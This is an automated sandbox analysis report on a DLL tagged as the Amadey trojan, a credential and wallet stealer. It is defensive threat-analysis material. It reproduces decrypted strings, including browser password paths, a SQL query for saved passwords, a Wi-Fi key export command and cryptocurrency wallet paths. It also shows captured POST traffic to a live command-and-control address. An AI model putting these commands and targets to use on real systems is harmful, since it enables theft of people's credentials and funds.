Windows Analysis Report
uLV6jN2BWh.dll

Overview

General Information

Sample name: uLV6jN2BWh.dll
renamed because original name is a hash value
Original sample name: 9fcac34b8162651f29288e1ffff9394d.dll
Analysis ID: 1542876
MD5: 9fcac34b8162651f29288e1ffff9394d
SHA1: 68f2eb355162fbe260c6f7256d2a13fa5e6227d0
SHA256: 61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
Tags: 32, Amadey, dll, exe, trojan

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Found potential dummy code loops (likely to delay analysis)
Sample uses string decryption to hide its real strings
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

AV Detection

Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: 185.215.113.217
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: /CoreOPT/index.php
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Mozilla\Firefox\Profiles\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \logins.json
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Exodus\exodus.wallet\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Electrum(
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: electrum_data\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Electrum.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Electrum\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Taskkill /IM ArmoryQt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Litecoin\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Taskkill /IM litecoin-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: DashCore\wallets\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Taskkill /IM dash-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Telegram(
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \user_data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \dictionaries
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: tdata\key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Telegram.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Desktop.zip
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: atomic\Local Storage\
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Taskkill /IM "Atomic Wallet.exe" /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Google\Chrome\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Google\Chrome\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Opera Software\Opera Stable\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Opera Software\Opera Stable\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Microsoft\Edge\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Microsoft\Edge\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \SputnikLab\Sputnik\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \SputnikLab\Sputnik\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Chromium\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Chromium\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Orbitum\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Orbitum\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Vivaldi\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Vivaldi\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Comodo\Dragon\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Comodo\Dragon\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \CocCoc\Browser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \CocCoc\Browser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Chedot\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \Chedot\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: CentBrowser
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \CentBrowser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: \CentBrowser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: netsh wlan export profile name=
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: folder=
Source: 10.2.rundll32.exe.6fb90000.0.unpack String decryptor: key=clear
Source: uLV6jN2BWh.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: uLV6jN2BWh.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB9BCEE FindFirstFileExW, 7_2_6FB9BCEE

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.215.113.217 80 Jump to behavior
Source: global traffic HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.217 | Content-Length: 5 | Cache-Control: no-cache | Data Raw: 77 6c 74 3d 31 | Data Ascii: wlt=1
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB91EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 7_2_6FB91EC0
Source: unknown HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.217 | Content-Length: 5 | Cache-Control: no-cache | Data Raw: 77 6c 74 3d 31 | Data Ascii: wlt=1
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.php
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.php)
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.php/J
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.php4
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.php5Y
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpV
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpdY
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpl
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.217/NF1d
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard, 7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB931B0 7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FBA1AB1 7_2_6FBA1AB1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6FB96B05 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6FB973B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6FB95D90 appears 103 times
Source: uLV6jN2BWh.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal56.evad.winDLL@18/0@0/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: uLV6jN2BWh.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: uLV6jN2BWh.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: uLV6jN2BWh.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uLV6jN2BWh.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uLV6jN2BWh.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uLV6jN2BWh.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uLV6jN2BWh.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 2307 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 7688 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 1015 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 8983 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148 Thread sleep count: 2307 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148 Thread sleep time: -2307000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148 Thread sleep count: 7688 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148 Thread sleep time: -7688000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152 Thread sleep count: 1015 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152 Thread sleep time: -1015000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152 Thread sleep count: 8983 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152 Thread sleep time: -8983000s >= -30000s Jump to behavior
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB9BCEE FindFirstFileExW, 7_2_6FB9BCEE
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8q8q
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX@

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 42% for more than 60s
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6FB97288
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB9A254 mov eax, dword ptr fs:[00000030h] 7_2_6FB9A254
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB9B881 mov eax, dword ptr fs:[00000030h] 7_2_6FB9B881
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB9D218 GetProcessHeap, 7_2_6FB9D218
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB96B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_6FB96B1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB99820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6FB99820

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.215.113.217 80 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB970A7 cpuid 7_2_6FB970A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_6FB973F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_6FB973F8